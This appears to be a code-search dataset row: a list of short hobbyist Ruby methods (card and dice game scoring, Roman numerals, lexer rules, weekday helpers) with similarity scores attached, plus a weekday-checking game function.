"def roman_numeral year\n thou = year/1000\n thou_remain = year%1000\n five_hundreds = thou_remain/500\n hundreds = (thou_remain%500)/100\n fifties = ((thou_remain%500)%100)/50\n tens = (((thou_remain%500)%100)%50)/10\n fives = ((((thou_remain%500)%100)%50)%10)/5\n ones = (((((thou_remain%500)%100)%50)%10)%5)/1\n \n \n #this is just to clear the terminal screen so you only see the result.\n100.times do puts \"\" \n end\n \n #outputs the letters times the number returned.\n puts \"M\" * thou + \"D\" * five_hundreds + \"C\" * hundreds + \"L\" * fifties + \"X\" * tens + \"V\" * fives + \"I\" * ones\nend",
"def preport\r\n\t\tputs \"#@name the #@type with #@health health has found an item and now has #@xp XP!\"\r\n\t\tputs \" \"\r\n\tend",
"def get_cr_or_level(num_of_pcs, cr_or_level)\n if num_of_pcs <= 4\n @cr = cr_or_level\n elsif num_of_pcs == 5\n @cr = cr_or_level + (cr_or_level * 0.25)\n elsif num_of_pcs == 6\n @cr = cr_or_level + (cr_or_level * 0.5)\n elsif num_of_pcs == 7\n @cr = cr_or_level + (cr_or_level * 0.75)\n elsif num_of_pcs == 8\n @cr = cr_or_level + cr_or_level\n end\n end",
"def scoreScissors m\n\t\t[1,0]\n\tend",
"def scoreRock m\n\t\t[0,0]\n\tend",
"def raindrops(number)\n output = \"\"\n if number % 3 != 0 && number % 5 !=0 && number % 7 != 0\n output = number\n end\n if number % 3 == 0\n output += 'Pling'\n end\n if number % 5 == 0\n output += 'Plang'\n end\n if number % 7 == 0\n output += 'Plong'\n end\n puts output\nend",
"def virality\n 0\n end",
"def base\n nombre = @nombre\n b = 1# nombre de diese\n nombre.times do |i|\n if i == 0\n next\n end\n espace = \" \"\n has = \"# \"\n \n c = nombre - i# nombre d'espace\n a = nombre - c\n puts \" #{espace*=c} #{has=has*b}\"\n b = (i + 2 + a)-1# nombre de diese\n end\n\nend",
"def pos_to_slot()\n {1 => 19, 2 => 25, 3 => 31, 4 => 87, 5 => 93, 6 => 99, 7 => 155, 8 => 161, 9 => 167}\nend",
"def calculate_score(hand_of_cards)\n card_values = hand_of_cards.map{|card_value| card_value[1]}\n total = 0 \n card_values.each do |card_value| \n if card_value == \"ACE\"\n total+= 11\n elsif card_value.to_i == 0 #For suits ie Jester, Queen\n total+= 10\n else \n total+= card_value.to_i\n end\n end \n\n#adjust for Aces\n card_values.select{|card| card == \"ACE\"}.count.times do \n total-=10 if total > 21\n end \n total\nend",
"def score\n if strike?\n pins + next_two_rolls rescue nil\n elsif spare?\n pins + next_roll rescue nil\n else\n pins\n end\n end",
"def weight\n 2 # ounces\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 46 )\n\n \n # - - - - main rule block - - - -\n # at line 392:10: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 46 )\n\n end",
"def comp_choose_rps\n\trand_num = rand(3) \n\tif rand_num == 1 \n\t \"rock\"\n\telsif rand_num == 2 \n\t \"paper\"\n\telse \n\t \"scissors\"\n\tend\nend",
"def bicipital\n\t\t(@bicipital[0] + @bicipital[1] + @bicipital[2])/3\n\tend",
"def forty_two\n self[41]\n end",
"def tiredness (hours)\n if hours == 'ok'\n @rested += 1\n elsif hours == 'bad'\n @rested -= 1\n elsif hours == 'shit'\n @rested -= 5\n elsif hours == 'amazing'\n @rested += 5\n end\n end",
"def CP(level)\r\n cpNeeded = 0\r\n if level > 0 && level <= 5\r\n cpNeeded + 4\r\n elsif level > 5 && level <= 20\r\n cpNeeded + 8\r\n else\r\n cpNeeded + 0\r\n end\r\nend",
"def scorePaper m\n\t\t[0,0]\n\tend",
"def getNbRecompense\n return 0\n end",
"def determine_hand_value(hand)\n value_hand = hand.map do |x|\n if x.include?(\"Ace\")\n x = 11\n elsif [\"K\", \"Q\", \"J\", \"1\"].include?(x[0])\n x = 10\n else\n x = x[0].to_i\n end\n end\n value_hand = value_hand.inject(0) { |result, element| result + element }\n adjust_value_for_aces(hand, value_hand)\nend",
"def australian_postcodes_po_boxes\n nsw = (1000..1999).to_a\n act = (200..299).to_a\n vic = (8000..8999).to_a\n qld = (9000..9999).to_a\n sa = (5800..5999).to_a\n wa = (6800..6999).to_a\n tas = (7800..7999).to_a\n nt = (900..999).to_a\n \n # Convert integers to strings (postcodes are *not* integers)\n (nsw + act + vic + qld + sa + wa + tas + nt).map { |p| \"%04i\" % p }\nend",
"def convert_rt_priority_to_freshdesk (rt_priority)\n return 1 if rt_priority.to_i == 4\n return 2 if rt_priority.to_i == 3\n return 3 if rt_priority.to_i == 2\n return 4 if rt_priority.to_i == 1\nend",
"def print_case\n puts \" 1 2 3\" \n for n in 0..2 do #on commence à compter à 0\n print (65+n).chr + \" \" #affiche 65.chr correspond à A en ACSII donc ensuite en ajoutant n, on a B, C, \n @case_array[n][0].print_case\n print \" | \"\n @case_array[n][1].print_case\n print \" | \"\n @case_array[n][2].print_case \n puts\n end \n end",
"def name\n case @value\n when 0\n 'Joker'\n when 11\n \"Jack of #{@suit}\"\n when 12\n \"Queen of #{@suit}\"\n when 13\n \"King of #{@suit}\"\n when 14\n \"Ace of #{@suit}\"\n else\n \"#{@value.to_s} of #{@suit}\"\n\n end\n end",
"def kcalproteinas\n\t\t\t@proteinas * 4\n\t\tend",
"def value(hand)\n ace_count = 0\n hand_value = 0\n\n hand.each do |card|\n if card == :ace\n ace_count += 1\n hand_value += 11\n else\n hand_value += card\n end\n end\n\n # flip aces from being worth 11 to being worth 1 until we get <= 21\n # or we run out of aces\n while hand_value > 21 && ace_count > 0\n hand_value -= 10\n ace_count -= 1\n end\n\n hand_value\nend",
"def score\n return 'love' if love?\n return \"fifteen\" if fifteen?\n return \"thirty\" if thirty?\n return \"forty\" if forty?\n return \"deuce\" if deuce?\n return \"advantage\" if advantage?\n return \"win\" if win?\n end",
"def non_zero_digit; end",
"def huella_carbono\n if geidiario() < 800\n return 1\n end\n if geidiario() > 1200\n return 3\n else\n return 2\n end\n end",
"def criminal_skills(roll)\n case roll\n when 1..2\n if @@skills.include? \"Barter\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Barter\" # 1 pt max\n end\n when 3..9\n @@skills << \"Climbing\"\n when 10..13\n @@skills << \"Disguise Artist\"\n when 14..19\n @@skills << \"Dodge\"\n when 20..21\n @@skills << \"Driver\"\n when 22\n if @@skills.include? \"Erotic Arts\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Erotic Arts\" # max 1 skill pt in this area\n end\n when 23..25\n if @@skills.include? \"Forgery\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Forgery\"\n @@literacy = \"Literate\"\n end\n when 26..29\n @@skills << \"Gambler\"\n when 30..31\n @@skills << \"Grapple\"\n when 32\n @@skills << \"Gun Slinger\"\n when 33\n @@skills << \"Gunsmith\"\n when 34..37\n @@skills << \"Junk Crafter\"\n when 38..41\n @@skills << \"Knife Fighter\"\n when 42..47\n @@skills << \"Knife Thrower\"\n when 48..51\n @@skills << \"Lying\"\n when 52\n @@skills << \"Medic\"\n when 53..54\n if @@skills.include? \"Navigate by Stars\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Navigate by Stars\" # max 1 point in this skill\n end\n when 55\n @@skills << \"Negotiating\"\n when 56..66\n @@skills << \"Pick Locks\"\n when 67..77\n @@skills << \"Pick Pocket\"\n when 78\n @@skills << \"Pilot\"\n when 79\n @@skills << \"Relic Knowledge\"\n when 80..81\n @@skills << \"Riding\"\n when 82\n @@skills << \"Sniper\"\n when 83..88\n @@skills << \"Stealth\"\n when 89..91\n @@skills << \"Tracking\"\n when 92..94\n @@skills << \"Unarmed Combat\"\n when 95\n @@skills << \"Wilderness Survival\"\n when 96..100\n @@skills << \"Weapons Expert\"\n # if rolled more than once, take a second level in the same weapon or randomly roll a new weapon -- player's choice. Mutants and cyborgs can choose to apply the weapon expert skill to a mutation or implant, as desired.\n end\nend",
"def printCard(card_number)\n \n # get card rank\n rank = case card_number % 13\n when 0 then :King\n when 1 then :Ace\n when 11 then :Jack\n when 12 then :Queen\n else card_number % 13 \n end\n \n # get suit\n suit = case (card_number) % 4\n when 0 then :Heart\n when 1 then :Diamond\n when 2 then :Spade\n else :Club\n end\n\n return \"#{rank} of #{suit}\"\n \nend",
"def how_many_light_sabers_do_you_own(name = \"\")\n name == \"Zach\" ? 18 : 0\nend",
"def get_grade(n)\n puts n\n case n\n when 90..100\n p \"A\"\n when 80..89\n p \"B\"\n when 70..79\n p \"C\"\n when 60..69\n p \"D\"\n when 00..59\n p \"F\"\n else\n puts \"Please enter a number.\"\n end\n\nend",
"def assess_situation(number, announcement, excuse)\n if number == 99\n puts \"#{excuse}\"\n elsif number == 21\n puts \"#{announcement}\"\n else number == 3\n puts \"Meh. Hard Pass\"\n end\nend",
"def get_numerology (your_number)\r\n\tcase your_number\r\n\t\twhen 1\r\n\t\t\tputs \"You are a ONE! One is the leader. The number one indicates the ability to stand alone, and is a strong vibration. Ruled by the Sun.\"\r\n\t\twhen 2\r\n\t\t\tputs \"You are a TWO! This is the mediator and peace-lover. The number two indicates the desire for harmony. It is a gentle, considerate, and sensitive vibration. Ruled by the Moon.\"\r\n\t\twhen 3\r\n\t\t\tputs \"You are a THREE! Number Three is a sociable, friendly, and outgoing vibration. Kind, positive, and optimistic, Three’s enjoy life and have a good sense of humor. Ruled by Jupiter.\"\r\n\t\twhen 4\r\n\t\t\tputs \"You are a FOUR! This is the worker. Practical, with a love of detail, Fours are trustworthy, hard-working, and helpful. Ruled by Uranus.\"\r\n\t\twhen 5\r\n\t\t\tputs \"You are a FIVE! This is the freedom lover. The number five is an intellectual vibration. These are ‘idea’ people with a love of variety and the ability to adapt to most situations. Ruled by Mercury.\"\r\n\t\twhen 6 \r\n\t\t\tputs \"You are a SIX! This is the peace lover. The number six is a loving, stable, and harmonious vibration. Ruled by Venus.\"\r\n\t\twhen 7 \r\n\t\t\tputs \"You are a SEVEN! This is the deep thinker. The number seven is a spiritual vibration. These people are not very attached to material things, are introspective, and generally quiet. Ruled by Neptune.\"\r\n\t\twhen 8 \r\n\t\t\tputs \"You are an EIGHT! This is the manager. Number Eight is a strong, successful, and material vibration. Ruled by Saturn.\"\r\n\t\twhen 9\r\n\t\t\tputs \"You are a NINE! This is the teacher. Number Nine is a tolerant, somewhat impractical, and sympathetic vibration. Ruled by Mars.\"\r\n\t\telse \r\n\t\t\tputs \"Sorry, but your number doesn't exist.\"\r\n\tend\r\nend",
"def print_changing_numbers\n\t\ti = 1\n\t\t#zolang i kleiner is dan 11\n\t\twhile i < 11\n\t\t\t#print de string met het nummer variabele en verhoog het daarna met 1\n\t\t\tputs \"This sentence is number #{i}\"\n\t\t\ti = i+1\n\t\tend\n\tend",
"def cuantos_pares\n @pares = []\n @pares = @valores.to_h.select{|k, v| (2..2).cover?(v)}\n @pares.size\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 37 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 136:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 37 )\n\n end",
"def roman_numeral number\n\nend",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 53 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 352:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 53 )\n\n end",
"def score\n result = 0\n tiro_index = 0\n rellenar_vector\n\n 10.times do\n if strike?(tiro_index)\n result += strike_Score(tiro_index)\n tiro_index += 1\n elsif spare?(tiro_index)\n\n result += spare_score(tiro_index)\n tiro_index += 2\n else\n result += cuadro_score(tiro_index)\n tiro_index += 2\n end\n end\n result\n end",
"def preferences\n [\n {fish: 15, leisure: 1},\n {fish: 15, leisure: 0},\n {fish: 14, leisure: 0},\n {fish: 13, leisure: 0},\n {fish: 12, leisure: 0},\n {fish: 11, leisure: 0},\n {fish: 10, leisure: 0},\n {fish: 9, leisure: 0},\n {fish: 8, leisure: 0},\n {fish: 7, leisure: 0},\n {fish: 6, leisure: 0},\n {fish: 5, leisure: 0},\n {fish: 4, leisure: 0},\n {fish: 3, leisure: 0},\n {fish: 2, leisure: 0},\n {fish: 1, leisure: 0},\n {fish: 0, leisure: 0}\n ]\n end",
"def ayarla(toplam)\n if toplam > 0\n return 1\n else\n return 0\n end\n end",
"def - rival\n case rival\n when Paper\n puts 'Paper tie (loser Paper)'\n when Scissors\n puts 'Scissors cut Paper (loser Paper)'\n when Lizard\n puts 'Lizard eats Paper (loser Paper)'\n else\n return rival - self\n end\n Paper\n end"
] | [
"0.61682594",
"0.5817779",
"0.5750655",
"0.56960154",
"0.5677398",
"0.5660142",
"0.56399095",
"0.5547494",
"0.5535588",
"0.5528255",
"0.5483012",
"0.54519147",
"0.5434948",
"0.54230285",
"0.541586",
"0.5403975",
"0.53857213",
"0.5367293",
"0.5358745",
"0.53388107",
"0.53162485",
"0.5312163",
"0.53116137",
"0.5307852",
"0.530172",
"0.5299927",
"0.5292735",
"0.52912796",
"0.52880275",
"0.5284393",
"0.52770674",
"0.52688825",
"0.52606964",
"0.52606964",
"0.5248154",
"0.5236471",
"0.5215105",
"0.5211385",
"0.5211154",
"0.52055776",
"0.5202333",
"0.52005565",
"0.51977277",
"0.5194523",
"0.51838505",
"0.5181531",
"0.5180617",
"0.5179706",
"0.517797",
"0.5174341",
"0.5173554",
"0.51732105",
"0.5170943",
"0.51664937",
"0.51612085",
"0.51576674",
"0.5157412",
"0.51526326",
"0.51481813",
"0.51473916",
"0.51444376",
"0.5142608",
"0.5142127",
"0.5136651",
"0.5128358",
"0.5119313",
"0.5116132",
"0.5113206",
"0.5112608",
"0.5111912",
"0.5111329",
"0.5106036",
"0.5102099",
"0.51016647",
"0.5100237",
"0.50976485",
"0.50923514",
"0.5091495",
"0.5090733",
"0.50890297",
"0.50867426",
"0.5084875",
"0.50846595",
"0.5083726",
"0.50794303",
"0.50786716",
"0.5077489",
"0.5075183",
"0.507076",
"0.5070744",
"0.5059963",
"0.5056383",
"0.5055364",
"0.5051853",
"0.504906",
"0.50470483",
"0.50453335",
"0.5044858",
"0.50443035",
"0.5036427",
"0.503423"
] | 0.0 | -1 |
=============================================================================== Days of the week =============================================================================== | def pbIsWeekday(wdayVariable,*arg)
timenow = pbGetTimeNow
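  # Time#wday is 0 (Sunday) through 6 (Saturday), matching the day-name array below.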
wday = timenow.wday
ret = false
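  # ret becomes true if today's weekday is among the requested days.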
for wd in arg
ret = true if wd==wday
end
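  # Optionally store the localized name of today's weekday in the given game variable.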
if wdayVariable>0
$game_variables[wdayVariable] = [
_INTL("Sunday"),
_INTL("Monday"),
_INTL("Tuesday"),
_INTL("Wednesday"),
_INTL("Thursday"),
_INTL("Friday"),
_INTL("Saturday")][wday]
$game_map.need_refresh = true if $game_map
end
return ret
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def day_of_week\n dnum = day\n dnum -= 10 if dnum > 20\n dnum -= 10 if dnum > 10\n dnum -= 1\n dnum\n end",
"def day_of_week(date)\n 7 - date.cwday\n end",
"def dayOfWeek\n days = 0;\n tempYear = MIN_YEAR\n while tempYear < @year\n days += SimpleDate.daysInYear(tempYear).to_i\n tempYear+=1\n end\n\n days = days + ordinalDate\n #puts \"days #{days}\"\n days = days % 7\n\n end",
"def week\n first_day_of_week = @date.monday\n \n days_of_week = []\n 7.times do |time|\n days_of_week << day_and_types(first_day_of_week + time.days)\n end \n \n days_of_week\n end",
"def weeks() 7 * days end",
"def week_days\n {\n \"1\" => 'mon',\n \"2\" => 'tue',\n \"3\" => 'wed',\n \"4\" => 'thu',\n \"5\" => 'fri',\n \"6\" => 'sat',\n \"7\" => 'sun'\n }\n end",
"def day_of_week\n # Zellers: 0 = Saturday, 1 = Sunday, 2 = Monday, ..., 6 = Friday\n # day_of_week: 1 = Sunday, 7 = Saturday\n (zellers_congruence + 6) % 7\n end",
"def days\n monday..sunday\n end",
"def day_of_week\n # Date.wday returns 0-6 for Sunday,...Saturday\n return @day.wday\n end",
"def calendar_wdays(starting_day = 0)\n start_week = Date.today.beginning_of_week + (starting_day - 1).days # In rails week start in monday and monday.wday is 1\n (start_week...start_week+7.days).collect { |day| I18n.l(day, :format => '%A') }\n end",
"def day_of_week\n return -1 if self.day_of_year == 308\n result = self.days_since_epoch % 8\n if result > 0\n result\n else\n 8\n end\n\n end",
"def day_in_week_int \n\t\tdays = []\n\t\ttoday = Time.now\n\t\tdays.push(today.to_i)\n\t\ttoday_week_day = today.wday\n\t\tanothers = (0..6).select {|e| e != today_week_day}\n\t\tanothers.map do |e|\n\t\t\tdays.push(today.to_i - e*day_second)\n\t\tend\n\n\t\tdays.sort\n\tend",
"def days_in_week(*days)\n @test_time = @time if @test_time.nil?\n x_in_list_of_y(@test_time.wday, Configuration.parse_range(days,0...7).flatten)\n end",
"def days_past_in_week\n to_date.cwday\n end",
"def set_days_of_week\n @days_of_week = Date::DAYNAMES.each_with_index\n end",
"def start_of_week; self - wday.days end",
"def day_in_week(args = nil)\n if args\n args.each do |key, val|\n case key\n when :mfirst\n else\n raise ArgumentError, \"Invalid key in arguments: '#{key}'.\"\n end\n end\n end\n \n #This is a monday - 0. Use this date to calculate up against.\n def_date = Datet.new(1970, 1, 4)\n \n if self > def_date\n days = Datet.days_between(def_date, self)\n factor = days.to_f / 7.0\n diw = days - (factor.floor * 7)\n else\n days = Datet.days_between(self, def_date)\n factor = days.to_f / 7.0\n diw = days - (factor.floor * 7)\n diw = 7 - diw\n diw = 0 if diw == 7\n end\n \n #Monday should be the first day in the week.\n if args and args[:mfirst]\n if diw == 0\n diw = 6\n else\n diw -= 1\n end\n end\n \n return diw\n end",
"def end_of_week; self + (6 - wday).days end",
"def working_days_from_date(date)\r\n date = date + 1.day if date.cwday == 6\r\n day_of_the_week = date.cwday == 7 ? 0 : date.cwday\r\n calendar_days, business_days = self, self\r\n result_date = day_of_the_week + business_days\r\n if (result_date >= 6)\r\n business_days -= (6 - day_of_the_week)\r\n calendar_days += 2\r\n weeks = business_days / 5\r\n calendar_days += (weeks * 2)\r\n end\r\n date + calendar_days.days\r\n end",
"def wday() end",
"def days_left_in_week\n 7 - days_past_in_week\n end",
"def _week_day_numbers\n week_day_start = self.week_day_start\n week_day_start.capitalize if week_day_start.is_a? String\n [0, 1, 2, 3, 4, 5, 6].partition {|on| on >= day_names.index(week_day_start)%7 }.flatten\n end",
"def day_of_week\n to_time.wday\n end",
"def weekdays\n wdays = []\n wdays << 0 if sun\n wdays << 1 if mon\n wdays << 2 if tue\n wdays << 3 if wed\n wdays << 4 if thu\n wdays << 5 if fri\n wdays << 6 if sat\n\n wdays\n end",
"def days() 24 * hours end",
"def nth_wday_day(w,d)\n 1 + (d - (wday - day + 1)) % 7 + w * 7\n end",
"def w_day; end",
"def nwday_day(n)\n w = n % 7\n 1 + (w - (wday - day + 1)) % 7 + n - w\n end",
"def day_of_week\n\tif @current_time.wday == 0 || @current_time.wday == 6\n\t\tweek_period = \"Weekends\"\n\telse\n\t\tweek_period = \"Weekdays\"\n\tend\nend",
"def week; end",
"def wednesday\n day(:wednesday)\n end",
"def days\n self.to_i * 86_400\n end",
"def each_days_of_week(*wdays)\n if wdays.empty?\n each_days\n else\n each_days.except {|dt| !wdays.include?(dt.wday) }\n end\n end",
"def nth_wday; (day - 1) / 7 end",
"def wday\n components.weekday - 1\n end",
"def week\n working_date = DateTime.new(self.year, 1, 1)\n working_date.week_day_start = self.week_day_start\n working_date = (working_date-working_date.send(\"wday_offset\"))\n week_num = 0\n working_date.step(self) { |a_day| \n if a_day.wday == _week_day_numbers.first\n week_num += 1\n end\n }\n week_num\n end",
"def weeks ; self * 7.days ; end",
"def day_of_week(date)\n date.cwday # cwday returns the day of calendar week (1-7, Monday is 1).\nend",
"def get_start_of_week(d)\n d -= DAY until d.monday?\n d\n end",
"def week(date = Date.today)\n day = monday(date)\n (day..day + 6)\n end",
"def wday() @m_date.wday end",
"def days\n self * SECONDS_IN_DAY\n end",
"def getDayOnWeek(weekStart, dayVal)\n\t\tweekDay = ((7 + (dayVal - weekStart.wday)) % 7)\n\t\tdayDateVal = weekStart + weekDay.days\n\t\tdayDateVal\n\tend",
"def day_of_the_week(day)\n @dias = {1 => \"LUNES\", 2 => \"MARTES\", 3 => \"MIERCOLES\", 4 => \"JUEVES\", 5 => \"VIERNES\", 6 => \"SÁBADO\", 7 => \"DOMINGO\"}\n return @dias[day]\n end",
"def getSundays(d1,d2)\n d1 += 1 while (d1.wday != 0) # add days till starting on sunday\n sundays = []\n d1.step(d2,7) do |date| # move forward seven days for every sunday\n sundays .push date\n end\n sundays\nend",
"def day_of_week\n start_on.strftime(WEEKDAY_NAME)\n end",
"def wday\n return self.to_a[IDX_WDAY]\n end",
"def week_days(options={}, &block)\n start_date = self\n result = []\n (start_date-wday_offset).step 7 do |a_day|\n a_day.week_day_start = self.week_day_start\n if block_given?\n yield a_day\n else\n result.push(a_day)\n end\n end\n result\n end",
"def day_in_week_str\n\t\tdays = []\n\t\ttoday = Time.now\n\t\tdays.push(formatted(today))\n\t\ttoday_week_day = today.wday\n\t\tanothers = (0..6).select {|e| e != today_week_day}\n\t\tanothers.map do |e|\n\t\t\tdays.push(formatted(Time.at(today.to_i - e*day_second)))\n\t\tend\n\n\t\tdays.sort\n\tend",
"def days_of_week\n\n # create an array for processing\n days_array = [sunday, monday, tuesday, wednesday, thursday, friday, saturday]\n int_array = Array.new\n for day in days_array\n day ? int_array.push(1) : int_array.push(0)\n end\n\n # process with little recursive function\n r(int_array, 0)\n # fix first value, see note below\n int_array[0] == -1 ? int_array[0] = 1 : nil\n\n # final passes, change values into useable string\n int_array[0] == 1 ? int_array[0] = 'Su' : nil\n int_array[1] == 1 ? int_array[1] = 'M' : nil\n int_array[2] == 1 ? int_array[2] = 'Tu' : nil\n int_array[3] == 1 ? int_array[3] = 'W' : nil\n int_array[4] == 1 ? int_array[4] = 'Th' : nil\n int_array[5] == 1 ? int_array[5] = 'F' : nil\n int_array[6] == 1 ? int_array[6] = 'Sa' : nil\n\n int_array.delete(0)\n int_array.map{ |x| x == -1 ? '-' : x}.uniq.join\n\n end",
"def days_of_week_string\n dow = days_of_week_hash\n\n @days_of_week_string ||=\n (dow[:sunday] ? \"Su\" : \"\") +\n (dow[:monday] ? \"M\" : \"\") +\n (dow[:tuesday] ? \"Tu\" : \"\") +\n (dow[:wednesday] ? \"W\" : \"\") +\n (dow[:thursday] ? \"Th\" : \"\") +\n (dow[:friday] ? \"F\" : \"\") +\n (dow[:saturday] ? \"Sa\" : \"\")\n end",
"def date_end # originally date_start\n\tdate = Date.today\n\t(1..7).each do |n|\n\t\tdate = Date.today - n#.days\n\t\tbreak if date.wday == 6 # 0 = Sun, 1 = Mon ... 6 = Sat\n\tend\n\tdate\nend",
"def wday\n @date_time_value.wday\n end",
"def days ; self * 24.hours ; end",
"def weekday(days)\nt = Date.today\narr = []\n days.times do\n arr << \"ok\" if t.saturday? || t.sunday?; t = t - 1\n end\n arr.count\nend",
"def days_of_week_hash\n @days_of_week_hash ||= {\n :sunday => (days_of_week & SUNDAY ) > 0,\n :monday => (days_of_week & MONDAY ) > 0,\n :tuesday => (days_of_week & TUESDAY ) > 0,\n :wednesday => (days_of_week & WEDNESDAY ) > 0,\n :thursday => (days_of_week & THURSDAY ) > 0,\n :friday => (days_of_week & FRIDAY ) > 0,\n :saturday => (days_of_week & SATURDAY ) > 0\n }\n end",
"def days_of_week_between(day_of_week, start_date, end_date)\n ((start_date..end_date).select{ |d| d.wday == day_of_week }).count\n end",
"def day_of_week\n Date::DAYNAMES.fetch(recurring_event.day).downcase.to_sym\n end",
"def mweek; (5 - wday + day) / 7 end",
"def day_name; Date::DAYNAMES[wday] end",
"def each_wednesday(n=1, offset=0, dur=1); each_wdays(self.Wed,n,offset,dur); end",
"def day_of_week(*weekdays)\n merge(day: weekdays)\n end",
"def test_start_of_week(p_date)\n if p_date.wday == 0 #sundays count as end of week for vehicle app\n return p_date - 6\n else\n (p_date - p_date.wday.days) + 1 #start on monday\n end\n end",
"def days_of_week_array\n dow = days_of_week_hash\n\n @days_of_week_array ||= [\n dow[:sunday],\n dow[:monday],\n dow[:tuesday],\n dow[:wednesday],\n dow[:thursday],\n dow[:friday],\n dow[:saturday]\n ]\n end",
"def days_to_week_start(start_day = Date.beginning_of_week)\n start_day_number = DAYS_INTO_WEEK.fetch(start_day)\n (wday - start_day_number) % 7\n end",
"def days(n)\n n * 3600 * 24\nend",
"def day_of_the_week(time)\n Date::DAYNAMES[time.wday]\nend",
"def day_to_wdiw( day )\n\t\tk = offset( first_day.cwday )\n\t\td = day + k - 1\n\t\tw = d / DPW\n\t\tdiw = d % DPW\n\n\t\t[ w, diw ]\n end",
"def get_days\n return 0b0 if @params[:type] != 'advanced'\n\n return get_weekday_bitmask(['weekday_sun', 'weekday_mon', 'weekday_tue', 'weekday_wed', 'weekday_thu', 'weekday_fri', 'weekday_sat']) if @params[:schedule] == 'weekly'\n\n return get_month_bitmask(@params[:dates_picked]) if @params[:schedule] == 'monthly' && @params[:days] == 'specific'\n\n return get_unspecific_days\n\n end",
"def sunday_after days_ago=0\n d = Date.today - days_ago\n until d.sunday?\n d += 1\n end\n d\nend",
"def d_days( v )\n TimeDelta.new( DAY_TO_MS * v )\n end",
"def to_weekday_if_weekend(date)\n date += 1 if date.wday == 0\n date -= 1 if date.wday == 6\n date\n end",
"def day_of_week(weekdays, *extras)\n merge(day: weekdays.array_concat(extras))\n end",
"def cwday() \n _wday = @m_date.wday\n return 7 if _wday == 0\n \n return _wday\n end",
"def week_index\n @week_index ||= date.wday\n end",
"def wday_difference(from, to, direction)\n return direction * ((direction * (to - from)) % 7)\n end",
"def weekdays\n value.each_char.map { |c| WEEKDAYS.index(c) }\n end",
"def handle_dn\n @wday = Date::DAYS[@tokens[@index].get_tag(DayName).type]\n @index += 1\n @precision = :day\n end",
"def day_of_week(year, month, day)\n d = day\n m = (month - 3) % 12 + 1\n yy = month < 3 ? year-1 : year\n y = yy % 100\n c = yy / 100\n (d + (2.6 * m - 0.2).floor + y + (y/4.0).floor + (c/4.0).floor - 2*c) % 7\nend",
"def odd_week?; (to_i / 7.days).odd? end",
"def weeks\n\t\treturn self * 7.days\n\tend",
"def weeks\n\t\treturn self * 7.days\n\tend",
"def getDayOffCount\n\t\tdayCount = 0\n\t\tunless Setting.plugin_redmine_wktime['wk_schedule_weekend'].blank?\n\t\t\tdayCount = Setting.plugin_redmine_wktime['wk_schedule_weekend'].length\n\t\tend\n\t\tdayCount\n\tend",
"def wday\n to_g.wday\n end",
"def days; self * DAY; end",
"def days; self * DAY; end",
"def weekdays\n lines[1]\n end",
"def first_wday; (wday - day + 1) % 7 end",
"def days(*args)\n if args.first.is_a?(Range)\n @dow = format_range(args.first)\n else\n list = args.map {|day| day_value(day) unless day.is_a?(Fixnum) }\n @dow = list.join(',')\n end\n self\n end",
"def days(*args)\n if args.first.is_a?(Range)\n @dow = format_range(args.first)\n else\n list = args.map {|day| day_value(day) unless day.is_a?(Fixnum) }\n @dow = list.join(',')\n end\n self\n end",
"def event_days\n time_span / (24 * 60 * 60)\n end",
"def week\n @date.cweek\n end",
"def each_wdays(wd,n=1,offset=0,dur=1)\n build_subrange do |s|\n s.step = n\n s.adjust_range { |r| day_range(r) }\n s.offset { |dt| dt.to_date + (wd - dt.to_date.wday)%7 + offset*7 }\n s.increment { |dt,i| dt.to_date + i*7 }\n s.span { |dt| dt.to_date + dur }\n end\n end",
"def days\n\t\tif self.date.past?\n\t\t\t'Past'\n\t\telse\n\t\t\t((self.date - Date.today).to_i).to_s + ' Days'\n\t\tend\n\tend",
"def days(from_date = first_day.date, to_date = last_day.date)\n from_date = Date.new(2017, 1, 1)\n to_date = Date.new(2017, 12, 31)\n\n @days ||= workdays.select { |day| day.hours > 0 && (from_date..to_date).include?(day.date) }\n end",
"def days(num)\n # date calculated as the offset from midnight tommorrow. Zero will provide values for all times \n # today.\n d = Date.today + num\n {\n :type => :date,\n :value => d.strftime(STRFTIME_DATE_FORMAT)\n }\n end",
"def each_sunday( n=1, offset=0, dur=1); each_wdays(self.Sun,n,offset,dur); end",
"def weeks\n\t\tk = offset( first_day.cwday )\n\n [ first_week( k ) ] + middle_weeks( DPW - k )\n end",
"def lead_days\n 0\n end",
"def non_working_week_days\n @non_working_week_days ||= begin\n days = [] # Setting.non_working_week_days\n if days.is_a?(Array) && days.size < 7\n days.map(&:to_i)\n else\n []\n end\n end\n end",
"def weeks\n result = end_week - start_week + 1\n weeks = Date.new(start_date.year, 12, 31).strftime('%W').to_i\n result < 0 ? result + weeks : result\n end"
] | [
"0.81641483",
"0.78555655",
"0.7836805",
"0.7820718",
"0.7798211",
"0.7739801",
"0.77106684",
"0.7653655",
"0.76395094",
"0.756583",
"0.754693",
"0.75292236",
"0.7491989",
"0.7478662",
"0.7452789",
"0.7443966",
"0.7425835",
"0.73917234",
"0.73585266",
"0.7314526",
"0.7245878",
"0.72450876",
"0.7236904",
"0.7222534",
"0.71958864",
"0.7166604",
"0.71282995",
"0.7119519",
"0.70985484",
"0.709133",
"0.7090509",
"0.7081487",
"0.70623577",
"0.7050832",
"0.7034865",
"0.7024423",
"0.70170057",
"0.69988066",
"0.697915",
"0.6974948",
"0.696976",
